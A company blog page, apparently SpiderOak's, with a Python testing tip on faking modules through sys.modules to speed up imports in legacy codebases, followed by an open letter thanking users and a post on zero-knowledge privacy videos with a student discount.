This class allows you to access arbitrary attributes and get another Bucket
back. For example:

bucket = Bucket()
some_object = bucket.some.path.to.some_object
assert type(some_object) == Bucket

A caveat: since Python imports packages and modules recursively, you need to insert each
part of the dotted path into sys.modules for this to work. As you can see, I
have done this for foo.bar in the example from above.

sys.modules['foo'] = Bucket()
sys.modules['foo.bar'] = sys.modules['foo'].bar
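
For deeper paths, registering every prefix by hand gets tedious. The helper
below is one possible sketch of automating it. The name install_fake_package
and the package name fakepkg_demo are hypothetical, and it uses plain
types.ModuleType objects rather than Bucket so that it runs on its own.

```python
import sys
import types


def install_fake_package(dotted_name):
    """Register a fake module for every prefix of dotted_name.

    Hypothetical helper: returns the names it added to sys.modules so the
    caller can remove them again after the tests.
    """
    added = []
    parent = None
    parts = dotted_name.split(".")
    for i, part in enumerate(parts):
        name = ".".join(parts[: i + 1])
        module = types.ModuleType(name)
        sys.modules[name] = module
        if parent is not None:
            # Make the child reachable as an attribute of its parent too.
            setattr(parent, part, module)
        parent = module
        added.append(name)
    return added


names = install_fake_package("fakepkg_demo.sub.leaf")

# Both import forms now resolve from sys.modules.
import fakepkg_demo.sub.leaf
from fakepkg_demo.sub import leaf

# Clean up the fake entries.
for name in names:
    del sys.modules[name]
```

If a prefix such as fakepkg_demo were left out, the import statement would go
looking for a real package by that name, which is exactly the cost the fake is
meant to avoid.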

Ideally, using an isolated approach to TDD with Mock objects, your project
would never evolve into a state where importing modules takes a long time, but
when working with a legacy codebase, the above approach can sometimes help your
tests run faster, which means they’ll be run more often, during the transition.

Next, part two will outline two ways to run your tests regularly. After all, a
test suite is only useful when it is actually used.

A note to our Tech-Savvy, Forward-Thinking SpiderOak Users. Yes – We’re Talking to You!

An Open Letter to Our Tech-Savvy Forward-Thinking Users:

We wanted to send our utmost admiration and gratitude. Great activity continues as we and our industry grow and push forward. Much of what we have developed and the choices we have made since our 2007 inception have been because of you – our wonderful user base.

We also wanted to make you aware of two big recent announcements to cross our wire (if you haven’t seen them just yet):

  1. We launched our new website &
  2. We entered the Enterprise market with SpiderOak Blue

Breaking through these milestones, we wanted to thank our roots. Thank you for embracing the importance of privacy with us, steering us towards better design, a more comprehensive product experience, and demanding more of us and our strengths. Thanks to those of you who pushed us from your role in your company’s IT department or as CTO toward breaking through into the enterprise space.

We love our relationship with you and want to stay true to that. Keep the feedback coming in the wonderful honest and detailed form it has taken. And thank you – above all – for your continued patronage and support.

We look forward to serving you for many years ahead as we continue to prove that one doesn’t have to sacrifice privacy for the benefits obtained in the cloud…

We remain grateful,

The SpiderOak Team

Zero-Knowledge 101: What It Is & What It Means to You

Welcome to SpiderOak University. If you’re a student, new user, or a lover of continuous learning, this month we’re talking to you.

We’ll be posting a couple of video shorts each week where SpiderOak CEO Ethan Oberman uses a whiteboard to explain some of our basic product functionalities. School yourself and keep an eye out for our next POP QUIZ on Friday so you can receive extra GBs.

Who can you trust? This is an important question in today’s race to the cloud. We’ve worked hard over the past six years to build a trustworthy product that upholds user privacy above all else. SpiderOak CEO Ethan Oberman explains how SpiderOak developed its ‘Zero-Knowledge’ privacy policy, what it is, and how it works.

Do you have a .edu email address? Don’t forget – you can enjoy 50% off your private backup/sync/share account:

Sign up today.